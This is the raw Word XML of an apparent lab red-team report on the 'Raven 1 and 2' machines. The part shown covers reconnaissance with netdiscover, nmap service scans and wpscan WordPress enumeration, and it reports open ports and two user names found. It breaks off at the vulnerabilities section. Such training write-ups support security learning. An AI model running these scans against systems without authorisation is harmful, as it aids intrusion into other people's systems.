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1BB1B" w14:textId="70A8BA3D" w:rsidR="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF8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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00423CF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Red Team: Summary of Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33FA91" w14:textId="14930406" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF8">
      <w:pPr>
        <w:spacing w:before="400" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720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23CF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Raven 1 and 2</w:t>
      </w:r>
      <w:r w:rsidR="00BC0CB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:pict w14:anchorId="12191831">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B203489" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF8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23CF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8C5DE3" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFA9985" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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Critical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E044CE" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABC633C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37CAD1" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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23CF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140BEBDA" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B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5356F1" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B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CA096F" w14:textId="415B6FFB" w:rsid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First, I used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Netdiscover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find all IPs in the subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE3D3B0" w14:textId="77777777" w:rsidR="0026627B" w:rsidRDefault="0026627B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46D55" w14:textId="5374C2A1" w:rsidR="00423CF8" w:rsidRDefault="0026627B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="00423CF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00423CF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C9F58F" w14:textId="77777777" w:rsidR="0026627B" w:rsidRDefault="0026627B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69CC29" w14:textId="1E3CE92C" w:rsid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39C04" wp14:editId="7DE28F64">
            <wp:extent cx="5057775" cy="1683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3518" cy="16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8478" w14:textId="67EB3AD7" w:rsid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D3361" w14:textId="34E8F1F2" w:rsid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9F0FFA" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B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7382FF" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B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C7543" w14:textId="7234D245" w:rsid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then ran NMAP against each IP individually to identify the 2 targets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF356C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C878C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2989F569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714D3C9A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0D6CCDB7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3F3B9422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2615040E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0C71B59F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25392A40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06DC44D5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55FE08AD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65C2CB12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6ECBBB2F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7DA8A4CD" w14:textId="7302BDC3" w:rsidR="00A7098B" w:rsidRDefault="00A7098B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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Target 1 scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A8FAB3" w14:textId="1BA40035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  <w:r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000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56654EC8" w14:textId="77777777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2C7F54E1" w14:textId="47DF63DA" w:rsidR="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF8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  <w:r w:rsidRPr="00C52D5D">
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01FDDB87" wp14:editId="02DB79ED">
            <wp:extent cx="5667375" cy="517390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0945" cy="51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F7B7" w14:textId="5B420C27" w:rsidR="00A7098B" w:rsidRPr="0026627B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0026627B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268F1999" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:r w:rsidRPr="00A7098B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>22 SSH, 80 HTTP (Apache httpd 2.4.10 Debian),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 111 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 139 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 445 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AD5CEA2" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:r>
        <w:t>MAC Address 00:15:5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>D:00:04:10</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="576504B3" w14:textId="0CBC36E2" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:r>
        <w:t xml:space="preserve">OS: WIN 6.1 (Samba 4.2.14-Debian) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9224DD" w14:textId="209D04EF" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B"/>
    <w:p w14:paraId="553B5B6C" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A709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BC6E46" w14:textId="77777777" w:rsidR="0026627B" w:rsidRDefault="0026627B" w:rsidP="00A709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EFC7F" w14:textId="2AB1AD3A" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A709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:::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 then ran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WPScan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enumerate WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081B5167" w14:textId="2B946A08" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="006C6749">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>192.168.1.110/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="006C6749">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>wordpress</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> --wp-content-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -ep -et -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77B48646" w14:textId="639035AC" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B"/>
    <w:p w14:paraId="2E67E645" w14:textId="6F203DA0" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20D30AD4" wp14:editId="0A84038C">
            <wp:extent cx="5943600" cy="5800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EF08" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:r w:rsidRPr="00A7098B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Found 2 user names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E731EA0" w14:textId="77777777" w:rsidR="0026627B" w:rsidRDefault="00A7098B" w:rsidP="0026627B">
      <w:r w:rsidRPr="008B7506">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CAA74BC" wp14:editId="324D415D">
            <wp:extent cx="4781550" cy="995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622" cy="10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AF9F" w14:textId="6CA198E3" w:rsidR="00A7098B" w:rsidRPr="0026627B" w:rsidRDefault="00A7098B" w:rsidP="0026627B">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Target 2 scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D01287" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45864605" w14:textId="3BD62180" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00A70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$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00423CF8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A7098B"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 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A7098B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A7098B"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 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A7098B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A7098B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4282FE42" w14:textId="7B1E1312" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00423C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3C058" wp14:editId="0796D0C8">
            <wp:extent cx="4688560" cy="4839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45" cy="4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CE8" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:r>
        <w:t>Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00393E35" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:r>
        <w:t>22 SSH OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F14165A" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:r>
        <w:t>80 http Apache httpd 2.4.10 (Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA3CC9" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:r>
        <w:t xml:space="preserve">111 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 139 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 445 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DEAB4D4" w14:textId="77777777" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00A7098B">
      <w:r>
        <w:t>OS Windows 6.1 (Samba 4.2.14-Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A02D423" w14:textId="2CF1C7F5" w:rsidR="00A7098B" w:rsidRDefault="00A7098B" w:rsidP="00423C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0C6CA" w14:textId="1727037C" w:rsidR="0026627B" w:rsidRDefault="0026627B" w:rsidP="00423C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D6631" w14:textId="03451ACD" w:rsidR="0026627B" w:rsidRDefault="0026627B" w:rsidP="00423C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then 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wpscan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enumerate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Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6677CE85" w14:textId="1A46862F" w:rsidR="0026627B" w:rsidRDefault="0026627B" w:rsidP="0026627B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">$ Wpscan –url </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="006C6749">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>http://192.168.1.115</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> –wp-content-dir -ep -et -eu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E96813C" w14:textId="7568D64B" w:rsidR="0026627B" w:rsidRDefault="0026627B" w:rsidP="002662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310A68" wp14:editId="54565CA5">
            <wp:extent cx="5943600" cy="4086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EF76" w14:textId="31B391C0" w:rsidR="0026627B" w:rsidRDefault="0026627B" w:rsidP="0026627B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50EB38CF" wp14:editId="0CC35D82">
            <wp:extent cx="5943600" cy="2129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868" w14:textId="77777777" w:rsidR="0026627B" w:rsidRDefault="0026627B" w:rsidP="00423C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8D68B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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316A4AD7" w14:textId="77777777" w:rsidR="009519CE" w:rsidRDefault="00423CF8" w:rsidP="009519C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exposed service</w:t>
      </w:r>
      <w:r w:rsidR="009519CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7CAC4" w14:textId="1F98689A" w:rsidR="009519CE" w:rsidRPr="00423CF8" w:rsidRDefault="007B13CC" w:rsidP="009519CE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22 </w:t>
      </w:r>
      <w:r w:rsidR="009519CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCAA9CD" w14:textId="77777777" w:rsidR="009519CE" w:rsidRDefault="00423CF8" w:rsidP="009519C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exposed services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25186901" w14:textId="2D764F23" w:rsidR="009519CE" w:rsidRPr="00423CF8" w:rsidRDefault="007B13CC" w:rsidP="009519CE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80 HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D32FE09" w14:textId="2B2EA92A" w:rsidR="00214C8C" w:rsidRDefault="00423CF8" w:rsidP="00214C8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exposed services</w:t>
      </w:r>
      <w:r w:rsidR="00214C8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C8501" w14:textId="4E1F45D8" w:rsidR="00214C8C" w:rsidRPr="00423CF8" w:rsidRDefault="00214C8C" w:rsidP="00214C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     111 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19632F6C" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423C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EFA6F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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Target 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787A30A3" w14:textId="5CA86A73" w:rsidR="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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exposed services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4408A088" w14:textId="7E113E32" w:rsidR="009519CE" w:rsidRPr="00423CF8" w:rsidRDefault="00214C8C" w:rsidP="009519CE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22 </w:t>
      </w:r>
      <w:r w:rsidR="009519CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A8E5E3" w14:textId="62263951" w:rsidR="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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exposed services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F71D421" w14:textId="0C0786ED" w:rsidR="007B13CC" w:rsidRPr="00423CF8" w:rsidRDefault="00214C8C" w:rsidP="007B13CC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80 HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543E6719" w14:textId="77777777" w:rsidR="00214C8C" w:rsidRDefault="00423CF8" w:rsidP="00214C8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exposed services</w:t>
      </w:r>
      <w:r w:rsidR="00214C8C" w:rsidRPr="00214C8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F49A86" w14:textId="5F25A41C" w:rsidR="00214C8C" w:rsidRPr="00423CF8" w:rsidRDefault="00214C8C" w:rsidP="00214C8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           </w:t>
      </w:r>
      <w:r w:rsidRPr="00214C8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">111 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00214C8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BEA673A" w14:textId="77777777" w:rsidR="00472028" w:rsidRDefault="00472028" w:rsidP="00472028">
      <w:pPr>
        <w:spacing w:before="320" w:after="80" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339A09ED" w14:textId="14A3D335" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="0047202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23CF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Critical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B9766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color w:val="000000"/>
        </w:rPr>
        <w:t>The following vulnerabilities were identified on each target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BF6C7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E6F827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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CAAB11" w14:textId="1A870725" w:rsidR="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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critical vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4929DFA5" w14:textId="1698DEB1" w:rsidR="00472028" w:rsidRDefault="00472028" w:rsidP="0047202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Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69D21F43" w14:textId="55AB4664" w:rsidR="00472028" w:rsidRDefault="00472028" w:rsidP="00472028">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="006C6749">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>192.168.1.110/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="006C6749">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>wordpress</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> --wp-content-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -ep -et -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26B844C5" w14:textId="460F8A2B" w:rsidR="00472028" w:rsidRDefault="00472028" w:rsidP="00472028">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C1E20C2" wp14:editId="44F33B83">
            <wp:extent cx="4704130" cy="45910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072" cy="45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3A3F" w14:textId="77777777" w:rsidR="00472028" w:rsidRDefault="00472028" w:rsidP="00472028">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C1E5B7" w14:textId="2618CF87" w:rsidR="00472028" w:rsidRDefault="00472028" w:rsidP="00472028">
